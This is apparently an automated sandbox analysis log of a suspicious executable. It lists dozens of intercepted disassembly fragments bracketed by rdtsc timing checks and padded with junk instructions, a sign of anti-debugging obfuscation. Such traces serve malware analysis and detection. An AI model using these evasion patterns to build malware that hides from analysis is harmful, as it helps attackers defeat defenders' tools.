Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710344 second address: 571037A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF34080AB18h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 571037A second address: 5710389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710389 second address: 571038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 571038F second address: 5710393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710393 second address: 57103E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF34080AB18h 0x00000015 xor si, D4E8h 0x0000001a jmp 00007FF34080AB0Bh 0x0000001f popfd 0x00000020 call 00007FF34080AB18h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F05D9 second address: 56F05E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700DE3 second address: 5700DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700DE8 second address: 5700DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700DF8 second address: 5700DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700DFC second address: 5700E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700E0B second address: 5700E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700E24 second address: 5700E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57100D9 second address: 57100DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57100DF second address: 5710104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 jmp 00007FF3408102FDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF3408102FCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710104 second address: 571010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 571010A second address: 5710129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF340810304h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57307AD second address: 57307B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57307B1 second address: 57307B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57307B7 second address: 57307DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 880Fh 0x00000007 jmp 00007FF34080AB14h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movsx ebx, ax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57307DC second address: 5730812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a call 00007FF340810300h 0x0000000f pop ecx 0x00000010 popad 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730812 second address: 573083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF34080AB14h 0x0000000a add ax, 71A8h 0x0000000f jmp 00007FF34080AB0Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 573083D second address: 5730843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730843 second address: 5730853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730853 second address: 5730859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730859 second address: 573085F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 573085F second address: 5730863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730863 second address: 5730875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dh, D4h 0x0000000e mov bx, si 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730875 second address: 57308C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007FF3408102FEh 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF340810307h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57308C1 second address: 57308C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57308C7 second address: 57308CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57308CB second address: 5730928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007FF34080AB17h 0x0000000f je 00007FF3B200DB80h 0x00000015 pushad 0x00000016 mov cl, 55h 0x00000018 call 00007FF34080AB11h 0x0000001d jmp 00007FF34080AB10h 0x00000022 pop eax 0x00000023 popad 0x00000024 mov ecx, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF34080AB0Ch 0x0000002d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730928 second address: 573092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 573092E second address: 5730932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730932 second address: 5730936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730936 second address: 5730968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FF34080AB16h 0x00000010 and ecx, 1Fh 0x00000013 pushad 0x00000014 movzx ecx, dx 0x00000017 mov bh, 3Ch 0x00000019 popad 0x0000001a ror eax, cl 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730968 second address: 5730992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF3408102FDh 0x0000000a and si, 5E16h 0x0000000f jmp 00007FF340810301h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730992 second address: 57309A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57309A2 second address: 57309C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF340810300h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57309C8 second address: 57309CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57309CE second address: 5730A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00D92014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007FF3451F0CE9h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007FF340810300h 0x0000002b pop eax 0x0000002c jmp 00007FF340810300h 0x00000031 ret 0x00000032 nop 0x00000033 push eax 0x00000034 call 00007FF3451F0D06h 0x00000039 mov edi, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF340810307h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A22 second address: 5730A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A28 second address: 5730A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FF3408102FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A46 second address: 5730A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A4C second address: 5730A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A53 second address: 5730A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FF34080AB13h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF34080AB15h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0028 second address: 56E0031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0031 second address: 56E0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0035 second address: 56E0072 instructions: 0x00000000 rdtsc 0x00000002 call 00007FF3408102FFh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF340810300h 0x00000015 sub si, 1DF8h 0x0000001a jmp 00007FF3408102FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0072 second address: 56E0077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0077 second address: 56E0092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0092 second address: 56E0096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0096 second address: 56E009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E01B4 second address: 56E01B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E01B9 second address: 56E026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF3408102FDh 0x00000009 add esi, 75E02D96h 0x0000000f jmp 00007FF340810301h 0x00000014 popfd 0x00000015 mov dh, ch 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov dl, cl 0x0000001e mov dx, 2EF6h 0x00000022 popad 0x00000023 mov dword ptr [esp], esi 0x00000026 pushad 0x00000027 movsx edi, cx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FF340810302h 0x00000031 adc si, 5018h 0x00000036 jmp 00007FF3408102FBh 0x0000003b popfd 0x0000003c mov ebx, esi 0x0000003e popad 0x0000003f popad 0x00000040 mov esi, dword ptr [ebp+08h] 0x00000043 pushad 0x00000044 mov edi, eax 0x00000046 pushad 0x00000047 push eax 0x00000048 pop edi 0x00000049 pushfd 0x0000004a jmp 00007FF340810306h 0x0000004f sbb esi, 3D9DB1A8h 0x00000055 jmp 00007FF3408102FBh 0x0000005a popfd 0x0000005b popad 0x0000005c popad 0x0000005d xchg eax, edi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF340810305h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E026C second address: 56E033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E052h 0x00000007 push ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF34080AB14h 0x00000012 xchg eax, edi 0x00000013 jmp 00007FF34080AB10h 0x00000018 test esi, esi 0x0000001a jmp 00007FF34080AB10h 0x0000001f je 00007FF3B2058E6Bh 0x00000025 pushad 0x00000026 mov cl, BEh 0x00000028 pushfd 0x00000029 jmp 00007FF34080AB13h 0x0000002e and eax, 7C8AE70Eh 0x00000034 jmp 00007FF34080AB19h 0x00000039 popfd 0x0000003a popad 0x0000003b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000042 pushad 0x00000043 mov al, 82h 0x00000045 pushad 0x00000046 push edx 0x00000047 pop ecx 0x00000048 movsx edi, cx 0x0000004b popad 0x0000004c popad 0x0000004d je 00007FF3B2058E31h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007FF34080AB0Fh 0x0000005c xor si, 51CEh 0x00000061 jmp 00007FF34080AB19h 0x00000066 popfd 0x00000067 pushad 0x00000068 popad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E033B second address: 56E0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0341 second address: 56E03D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f pushfd 0x00000010 jmp 00007FF34080AB17h 0x00000015 add ch, FFFFFF8Eh 0x00000018 jmp 00007FF34080AB19h 0x0000001d popfd 0x0000001e popad 0x0000001f or edx, dword ptr [ebp+0Ch] 0x00000022 jmp 00007FF34080AB0Eh 0x00000027 test edx, 61000000h 0x0000002d jmp 00007FF34080AB10h 0x00000032 jne 00007FF3B2058DE1h 0x00000038 pushad 0x00000039 mov bx, cx 0x0000003c mov ah, 02h 0x0000003e popad 0x0000003f test byte ptr [esi+48h], 00000001h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FF34080AB10h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E03D0 second address: 56E03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF3B205E5B8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF340810305h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E03FC second address: 56E0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0402 second address: 56E0435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test bl, 00000007h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF340810305h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0746 second address: 56D074C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D074C second address: 56D0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0750 second address: 56D076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB12h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D076D second address: 56D0773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0773 second address: 56D079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF34080AB0Eh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D079F second address: 56D07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D07A3 second address: 56D07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D07C0 second address: 56D08A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7772h 0x00000007 pushfd 0x00000008 jmp 00007FF340810303h 0x0000000d adc esi, 5EA0AD6Eh 0x00000013 jmp 00007FF340810309h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF3408102FEh 0x00000022 push eax 0x00000023 pushad 0x00000024 mov edx, 2A46D394h 0x00000029 mov eax, ebx 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d jmp 00007FF3408102FFh 0x00000032 xchg eax, esi 0x00000033 jmp 00007FF340810306h 0x00000038 push eax 0x00000039 pushad 0x0000003a mov ax, bx 0x0000003d pushfd 0x0000003e jmp 00007FF3408102FDh 0x00000043 or ax, D866h 0x00000048 jmp 00007FF340810301h 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, esi 0x00000050 jmp 00007FF3408102FEh 0x00000055 mov esi, dword ptr [ebp+08h] 0x00000058 jmp 00007FF340810300h 0x0000005d sub ebx, ebx 0x0000005f jmp 00007FF340810301h 0x00000064 test esi, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08A6 second address: 56D08AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08AA second address: 56D08AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08AE second address: 56D08B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08B4 second address: 56D08BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08BA second address: 56D08BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08BE second address: 56D091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FF3B2065DB4h 0x00000011 jmp 00007FF340810300h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d jmp 00007FF340810300h 0x00000022 mov ecx, esi 0x00000024 jmp 00007FF340810300h 0x00000029 je 00007FF3B2065D8Ah 0x0000002f pushad 0x00000030 mov di, cx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D091D second address: 56D09AA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF34080AB16h 0x00000008 xor cx, 5CB8h 0x0000000d jmp 00007FF34080AB0Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d jmp 00007FF34080AB16h 0x00000022 jne 00007FF3B2060555h 0x00000028 jmp 00007FF34080AB10h 0x0000002d mov edx, dword ptr [ebp+0Ch] 0x00000030 jmp 00007FF34080AB10h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF34080AB17h 0x0000003d rdtsc
